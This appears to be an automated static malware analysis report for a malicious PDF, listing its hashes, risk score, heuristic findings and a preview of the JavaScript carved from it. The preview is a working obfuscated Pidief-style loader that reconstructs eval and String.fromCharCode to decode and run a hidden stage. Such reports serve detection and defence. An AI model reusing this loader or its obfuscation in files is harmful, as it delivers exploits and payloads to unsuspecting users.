Malicious PDF — malware analysis report

Static analysis result for SHA-256 22867d12f6481d25…

MALICIOUS

PDF

44.6 KB First seen: 2026-05-09
MD5: fb6d4cfb39ecd4bb62ffef10d2f55902 SHA-1: 95e6e4ea1c21cd88d09408adc363a78fa43af4f2 SHA-256: 22867d12f6481d258241b96f02be04d80d019da60958ec732a3750acd6a2392f
86 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File: Malicious JavaScript

The PDF document was flagged as suspicious by a machine learning classifier with high confidence. Static analysis revealed embedded JavaScript, which is often used to exploit PDF reader vulnerabilities or download secondary payloads. The presence of a JavaScript action and an embedded JS stream strongly suggests malicious intent. No document body text was available for further analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xAFC5 444 bytes
SHA-256: dd0e0d431d3186a01218559472b9fe9f47e3b86b0f232d2f1c3c68ca280ba3cc
Preview script
First 1,000 lines of the extracted script
qwe = ('nhsthn','ntrht').substr;
var g = qwe();
t='le';
a=["e","a","n","b","w",'v'];
e=g[a[0]+a[5]+a[1]+t[0]];
xvwe='';
qxr=('qwrwqr','tit');
e('rwe=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t);
yutb=e('String.fr'+rwe.substr(0,10));
qasg = e(rwe.substr(10)['replace'](/u/g,','));
e('k=qasg.length');
for (i = 0; i < k; i+=2) {
	zkrqi = qasg[i+1] + ('erybjkerl',qasg[i]);
	xvwe += yutb(zkrqi);
}
e(xvwe);